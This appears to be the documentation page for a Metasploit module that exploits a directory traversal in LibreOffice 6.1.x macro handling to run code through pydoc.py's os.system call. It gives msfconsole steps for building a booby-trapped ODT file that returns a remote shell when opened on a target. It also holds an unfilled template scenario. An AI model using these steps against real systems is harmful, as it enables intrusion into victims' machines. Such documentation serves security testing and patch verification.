Shelby Pace
1.8 KiB
Description
This module exploits a directory traversal vulnerability in LibreOffice v6.1.0-6.1.4.1 that enables remote code execution.
Note: 6.0.x versions are vulnerable to the directory traversal attack, but are not exploitable by this module due to the
lack of ability to pass arguments.
LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
to them. A macro can be tied to a program event by including the script that contains the macro and the function
name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the
Python script to be executed. This allows a program event to execute functions from Python scripts relative to the
path of the samples macros folder. The pydoc.py script included with LibreOffice contains the tempfilepager function
that passes arguments to os.system, allowing RCE.
This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.
Vulnerable Application
LibreOffice v6.1.0-6.1.4.1. Vulnerable versions for both Windows and Linux can be found here.
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/fileformat/libreoffice_macro_exec - Do:
set FILENAME <name> - Do:
set LHOST <ip> - Do:
set LPORT <port> - Do:
run - Move the generated file to the target
- Open the file with a vulnerable version of LibreOffice
- You should get a shell.
Scenarios
Version of software and OS as applicable
msf > use module_name
msf auxiliary(module_name) > set POWERLEVEL >9000
msf auxiliary(module_name) > exploit